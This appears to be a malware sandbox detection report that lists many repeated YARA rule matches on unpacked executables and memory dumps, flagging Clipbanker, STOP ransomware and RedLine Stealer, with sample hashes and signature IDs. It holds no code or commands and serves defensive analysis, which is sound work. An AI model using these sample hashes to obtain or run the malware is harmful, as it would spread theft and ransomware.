Source: 13.2.build3.exe.8515a0.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 33.2.mstsca.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 33.2.mstsca.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 30.2.mstsca.exe.8615a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 30.2.mstsca.exe.8615a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 32.2.mstsca.exe.9615a0.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 32.2.mstsca.exe.9615a0.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 0.2.R5391762lf.exe.5ea15a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 0.2.R5391762lf.exe.5ea15a0.1.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 6.2.R5391762lf.exe.5ec15a0.1.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 6.2.R5391762lf.exe.5ec15a0.1.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 8.2.R5391762lf.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 8.2.R5391762lf.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 23.2.R5391762lf.exe.5e115a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 23.2.R5391762lf.exe.5e115a0.1.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 23.2.R5391762lf.exe.5e115a0.1.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 23.2.R5391762lf.exe.5e115a0.1.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 12.2.R5391762lf.exe.5da15a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 12.2.R5391762lf.exe.5da15a0.1.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 2.2.R5391762lf.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 2.2.R5391762lf.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 14.2.R5391762lf.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 14.2.R5391762lf.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 6.2.R5391762lf.exe.5ec15a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 6.2.R5391762lf.exe.5ec15a0.1.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 5.2.R5391762lf.exe.5db15a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 5.2.R5391762lf.exe.5db15a0.1.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 12.2.R5391762lf.exe.5da15a0.1.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 12.2.R5391762lf.exe.5da15a0.1.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 24.2.R5391762lf.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 24.2.R5391762lf.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 14.2.R5391762lf.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 14.2.R5391762lf.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 24.2.R5391762lf.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 24.2.R5391762lf.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 0.2.R5391762lf.exe.5ea15a0.1.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 0.2.R5391762lf.exe.5ea15a0.1.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 8.2.R5391762lf.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 8.2.R5391762lf.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 2.2.R5391762lf.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 2.2.R5391762lf.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 0000001E.00000002.2677102464.0000000000860000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 0000001E.00000002.2677102464.0000000000860000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 0000000E.00000002.1561850226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 0000000E.00000002.1561850226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000006.00000002.1411124880.0000000005EC0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000008.00000002.3833609200.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000008.00000002.3833609200.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000014.00000002.3833462867.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 00000014.00000002.3833462867.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 00000005.00000002.1405143882.0000000004456000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 0000000D.00000002.1620821652.000000000088C000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 0000000C.00000002.1548831250.0000000005DA0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000005.00000002.1405257408.0000000005DB0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000018.00000002.1801978048.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000018.00000002.1801978048.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000000.00000002.1373934785.0000000004498000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000002.00000002.1397075363.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000002.00000002.1397075363.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000009.00000002.1502845330.0000000001D0E000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 0000000C.00000002.1548118097.0000000004466000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000002.1374077836.0000000005EA0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000006.00000002.1411013560.0000000004578000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 0000001B.00000002.2060772952.0000000000B00000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000017.00000002.1792622413.0000000005E10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
